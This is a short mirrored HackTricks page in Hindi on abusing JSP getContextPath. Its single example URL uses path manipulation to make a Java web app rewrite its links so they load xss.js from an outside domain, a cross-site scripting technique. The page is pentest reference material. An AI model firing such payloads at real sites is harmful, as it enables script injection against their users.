mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
16 lines
642 B
Markdown
16 lines
642 B
Markdown
# JSP
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
## **getContextPath** दुरुपयोग
|
|
|
|
[यहाँ](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html) से जानकारी।
|
|
```
|
|
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
|
|
```
|
|
उस वेब को एक्सेस करते समय आप सभी लिंक को _**rakeshmane.com**_ से जानकारी मांगने के लिए बदल सकते हैं:
|
|
|
|
.png>)
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|